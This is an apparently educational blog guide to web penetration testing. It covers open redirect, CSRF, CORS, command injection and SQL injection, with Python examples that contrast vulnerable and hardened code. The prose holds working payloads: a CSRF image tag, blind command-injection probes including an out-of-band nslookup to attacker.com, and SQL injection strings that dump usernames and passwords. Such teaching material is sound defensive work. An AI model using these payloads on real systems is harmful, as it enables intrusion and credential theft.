Web penetration testing guide

5 min read · Dec 20, 2021

Open Redirect Vulnerability

An open redirect is when a website redirects the user to some other website or domain for a particular task. The vulnerability occurs when no checks are put on the redirect parameter, so the victim can be redirected to any website while the link still looks valid. For example, in this case redirect_to is the parameter to look for.
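As an added example (not code from the original post), the following Python shows the difference between using a redirect_to parameter as-is and validating it against the site's own host before issuing the redirect. The parameter name redirect_to comes from the post; the allowed host app.example.com and the function names are assumptions made for this illustration.

```python
# Added example (not from the original post): checking a redirect_to value
# before it is placed in a Location header. ALLOWED_HOSTS and the function
# names are assumptions for illustration.
from urllib.parse import urljoin, urlparse

ALLOWED_HOSTS = {"app.example.com"}   # constructed allow-list
DEFAULT_TARGET = "/"                  # where to send the user when the value is rejected


def unsafe_redirect_target(redirect_to: str) -> str:
    """Vulnerable pattern: whatever the client supplied becomes the Location."""
    return redirect_to


def safe_redirect_target(redirect_to: str, own_host: str = "app.example.com") -> str:
    """Return a path on our own origin, or DEFAULT_TARGET if the value would
    send the browser anywhere else."""
    if not redirect_to:
        return DEFAULT_TARGET
    # Browsers treat backslashes like slashes, so "\\evil.example" would be
    # read as a protocol-relative URL; normalise before parsing.
    redirect_to = redirect_to.replace("\\", "/")
    # Resolve relative paths against our own origin. urljoin turns
    # "//evil.example/x" into "https://evil.example/x", so the host check
    # below catches protocol-relative values as well.
    absolute = urljoin(f"https://{own_host}/", redirect_to)
    parts = urlparse(absolute)
    if parts.scheme not in ("http", "https"):
        return DEFAULT_TARGET          # e.g. javascript: or data: URLs
    if parts.hostname not in ALLOWED_HOSTS:
        return DEFAULT_TARGET          # foreign host, or user@host tricks
    # Re-emit a path-only target so the Location header never carries an
    # attacker-chosen host even when the checks above passed.
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return target


if __name__ == "__main__":
    for value in ["/account", "https://evil.example/phish", "//evil.example/phish",
                  "javascript:alert(1)", "https://app.example.com@evil.example/"]:
        print(f"{value!r:45} -> {safe_redirect_target(value)!r}")
```

The host check alone is not enough: a value like https://app.example.com@evil.example/ passes a naive "starts with our host" test, which is why the example parses the URL and then only ever emits the path and query.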

CSRF Attacks

A CSRF attack occurs when an attacker uses an HTTP request to get a user's information and then uses that information to act on the user's behalf. For example, a user clicks on a malicious link that leads to an HTTP GET request to his already logged-in bank account, resulting in a money transfer from his account to the attacker's account. The way the malicious link exploits his bank depends on whether the banking site accepts GET or POST requests.

The secure and httponly attributes tell the browser how the cookie should be sent and read. If a cookie contains the secure attribute, browsers will only send this cookie over HTTPS connections. The httponly attribute tells the browser that the cookie can only be read through HTTP and HTTPS requests: if a cookie is httponly, browsers won't allow any scripting language such as JavaScript to read its value.

CSRF with GET Requests

If the site accepts GET requests, then the link will contain a hidden form or an <img> tag. When the <img> tag is rendered by the browser, it makes an HTTP GET request to the URL in the src attribute. So, if the malicious site were to use a URL that transferred $500 from Bob to Joe, such as https://www.bank.com/transfer?from=bob&to=joe&amount=500, then a malicious image tag would use this URL as its source value, like in the following tag: <img src="https://www.bank.com/transfer?from=bob&to=joe&amount=500">

CSRF with POST Requests

The simplest thing we can do is change the content-type header to text/plain;charset=UTF-8. This will allow the attacker to submit an HTML form to the target site without the victim becoming aware.

Websites use CSRF tokens to protect against these attacks. The website generates two tokens: one is given to the user's browser and the other is kept by the website. Both can be compared when needed.

A CSRF attack is possible if:

  • An attacker wants to make a privileged action, for example changing the password of a victim.
  • The website relies only on cookie-based session handling for authentication.
  • There are no unpredictable parameters (in the URL) involved, i.e. parameters which cannot be guessed.

A CSRF token is a unique and unpredictable value generated by the server and given to the client to include in future requests, preventing CSRF attacks.

  • The server sends the client a token.
  • The client submits the form with the token.
  • The server rejects the request if the token is invalid.
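The three steps above, implemented as an added example in Python (this is not code from the original post). The in-memory SessionStore, the /change-password form and the function names are assumptions made for the illustration; the point shown is that a forged request from another site cannot carry a token it was never given, and that the server compares the submitted copy against its own copy in constant time.

```python
# Added example (not from the original post): a synchronizer-token CSRF
# check. SessionStore, the form and the handler names are assumptions.
import hmac
import secrets
from typing import Dict, Optional, Tuple


class SessionStore:
    """Stand-in for server-side session storage, keyed by session id."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {}
        return sid

    def get(self, sid: str) -> Optional[dict]:
        return self._sessions.get(sid)


def issue_csrf_token(store: SessionStore, sid: str) -> str:
    """Step 1: the server generates an unpredictable token, keeps one copy in
    the session and hands the other copy to the client."""
    token = secrets.token_urlsafe(32)
    store.get(sid)["csrf_token"] = token
    return token


def render_form(token: str) -> str:
    """Step 2 (client side): the token travels back as a hidden form field.
    A page on another origin cannot read this value, so it cannot forge it."""
    return ('<form method="POST" action="/change-password">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input type="password" name="new_password"></form>')


def verify_csrf(store: SessionStore, sid: str, submitted: Optional[str]) -> bool:
    """Step 3: accept only if the submitted token equals the session's copy."""
    session = store.get(sid)
    if session is None or not submitted:
        return False
    expected = session.get("csrf_token")
    if expected is None:
        return False
    # Constant-time comparison so the check itself does not leak the token.
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_change_password(store: SessionStore, sid: str, form: dict) -> Tuple[int, str]:
    """A privileged action guarded by the token check."""
    if not verify_csrf(store, sid, form.get("csrf_token")):
        return 403, "CSRF token missing or invalid"
    return 200, "password changed"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.new_session()
    token = issue_csrf_token(store, sid)
    print(handle_change_password(store, sid, {"csrf_token": token}))   # genuine form
    print(handle_change_password(store, sid, {}))                      # forged request
```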

CORS

This is the mechanism through which the browser decides whether to share resources with another (different) domain or not. It is implemented with an HTTP header. CORS is a security mechanism that allows a web page from one domain or origin to access a resource on a different domain (a cross-domain request). The Access-Control-Allow-Origin header in the HTTP protocol indicates which domains are allowed to access a certain resource.

It is important to understand CORS before working on CSRF.

SameSite Cookie

The SameSite cookie attribute is another mechanism used to prevent CSRF attacks. The samesite attribute is added in the set-cookie response header; the attribute can be given two values: Strict or Lax. If the value is Strict, the browser will not include the cookie in requests that originate from some other site.

Command Injection

Command injection, also known as shell injection, occurs when user input leads to commands being executed on the server side. The attacker is able to execute commands like whoami or ifconfig, depending on the type of system the website is hosted on.

Note that in order to find a command injection vulnerability we have to check every possible parameter in a particular URL.

Blind injection occurs when the commands are executed on the system but no output is returned to the end user.

  • To detect this type of vulnerability we can use the following ping command: & ping -c 10 [target ip] & causing the website to ping the IP address, which in most cases is its own loopback interface.
  • Another way to detect blind injection is by redirecting the output, for example & whoami > /var/www/static/whoami.txt & After this we can point our browser at that file to confirm the output.
  • Another way to detect this type of vulnerability is by using an out-of-band technique, which means we input a command that triggers a network interaction between the web server and a machine we own. For example & nslookup attacker.com
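As an added example (not from the original post), the Python below shows a "ping a host" feature written the vulnerable way and the hardened way: the hostname parameter, the allow-list regex and the function names are assumptions for this illustration, and ping is only built as an argument list, never run. The echo_argument helper spawns a child process with an argument list to show that shell metacharacters such as & are passed through as plain text when no shell is involved.

```python
# Added example (not from the original post): vulnerable vs hardened handling
# of a host parameter that ends up on a command line. Names are assumptions.
import re
import subprocess
import sys
from typing import List

# Strict allow-list: letters, digits, dots and hyphens, alphanumeric at both
# ends. Rejects spaces, &, ;, |, $ and a leading "-" (no option injection).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")


def vulnerable_command(host: str) -> str:
    """Vulnerable pattern: the request parameter is pasted into a command
    string that the server later runs through a shell. Anything after & or ;
    is parsed by that shell as a second command."""
    return "ping -c 1 " + host


def safe_argv(host: str) -> List[str]:
    """Hardened: validate the value against the allow-list, then build an argv
    list so it reaches the program as one argument with no shell parsing."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def is_accepted(host: str) -> bool:
    """True if the allow-list would let this value through."""
    try:
        safe_argv(host)
        return True
    except ValueError:
        return False


def echo_argument(value: str) -> str:
    """Run a child process with an argv list (the Python interpreter itself,
    to stay portable) and return what the child saw as argv[1]. Metacharacters
    come back unchanged because no shell ever interpreted them."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    probe = "127.0.0.1 & whoami &"          # constructed test value
    print("shell string :", vulnerable_command(probe))
    print("child argv[1]:", echo_argument(probe))
    print("allow-list   :", is_accepted(probe), is_accepted("example.com"))
```

Validation and argument lists are complementary: the allow-list stops junk before it reaches any program, and the argv list means that even a value the allow-list missed cannot start a second command.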

SQL Injection

A SQL injection attack is when an attacker is able to compromise a website or server through SQL queries. These can lead to sensitive data exposure.

There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:

We can retrieve hidden data by changing a URL, which in turn changes the SQL query on the back end, resulting in data leakage. For example, GET /filter?category=Gifts'+OR+1=1-- HTTP/1.1 returns all the available categories: 1=1 is always true, so with OR 1=1 the WHERE condition always matches and every category is leaked.

Suppose we use the administrator'-- payload in the login user name; the -- comments out the rest of the query, so the application ignores the password field.

SQL UNION attacks involve tampering with the queries whose results are returned in application responses; as a result we get data from other SQL tables. This is done using the UNION keyword, which lets us execute additional SELECT queries along with the original one. For a UNION query to work, two key requirements must be met:

  • The individual queries must return the same number of columns.
  • The data types in each column must be compatible between the individual queries.

In other words, the query after the UNION must have the same number of columns as the query before it, and the data type of each column must match its counterpart.

The first step of such an attack is to determine the number of columns returned by the original query. To do this, use NULL in the injection site, e.g. GET /filter?category=Accessories'+UNION+SELECT+NULL,NULL,NULL--, adding or removing NULLs until the server's 500 error turns into a 200 OK response, which indicates the application is vulnerable. The reason for using NULL as the values returned from the injected SELECT query is that the data types in each column must be compatible between the original and the injected queries. Since NULL is convertible to every commonly used data type, using NULL maximizes the chance that the payload will succeed when the column count is correct.

To find which column can hold string data, replace each NULL in turn with a string and look for a 200 OK response. For example GET /filter?category=Corporate+gifts'+UNION+SELECT+NULL,'rqk60W',NULL-- HTTP/1.1

If we know the table and column names, we can use this type of payload: GET /filter?category=Corporate+gifts'+UNION+SELECT+username,+password+FROM+users--
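As an added example (not from the original post), the Python below builds the /filter and login queries discussed in this section twice: once by concatenating the request parameter into the SQL string (the vulnerable form behind all of the payloads above, from OR 1=1 through the UNION SELECT of username and password) and once with parameterised queries, where the whole value is bound as a single literal and the same payloads match nothing. The products and users tables follow the names used in the post; the rows, the released column and the function names are constructed assumptions, and the database is an in-memory SQLite instance.

```python
# Added example (not from the original post): string-concatenated queries
# (vulnerable) next to parameterised queries (hardened) on a constructed
# in-memory SQLite database. Row data and the released column are made up.
import sqlite3
from typing import List, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed schema and rows; 'Prototype' is an unreleased (hidden) item.
    Passwords are stored in clear text only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1);
        INSERT INTO products VALUES ('Pen', 'Corporate gifts', 1);
        INSERT INTO products VALUES ('Prototype', 'Accessories', 0);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-secret');
    """)
    return conn


def filter_vulnerable(conn: sqlite3.Connection, category: str) -> List[Tuple]:
    """Vulnerable: the quote in Gifts' OR 1=1-- closes the string literal,
    OR 1=1 makes the WHERE always true and -- comments out released = 1.
    A UNION SELECT with two columns is accepted for the same reason."""
    sql = ("SELECT name, category FROM products WHERE category = '"
           + category + "' AND released = 1")
    return conn.execute(sql).fetchall()


def filter_safe(conn: sqlite3.Connection, category: str) -> List[Tuple]:
    """Hardened: the value is bound as one parameter, so the payload is
    compared against the category column as text and matches no row."""
    sql = "SELECT name, category FROM products WHERE category = ? AND released = 1"
    return conn.execute(sql, (category,)).fetchall()


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: administrator'-- turns the password check into a comment."""
    sql = ("SELECT 1 FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: both values are bound; the -- is just part of a username."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = build_db()
    payload = "Gifts' OR 1=1--"
    print("vulnerable:", filter_vulnerable(db, payload))
    print("safe      :", filter_safe(db, payload))
    print("login     :", login_vulnerable(db, "administrator'--", "x"),
          login_safe(db, "administrator'--", "x"))
```

The UNION case also shows why the column-count step above matters: with two columns on the left, only a two-column SELECT on the right runs; any other count makes the database raise an error, which is the 500 response the post describes.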

In blind SQL injection the results of the payload are not returned, i.e. there is no query-related response from the application.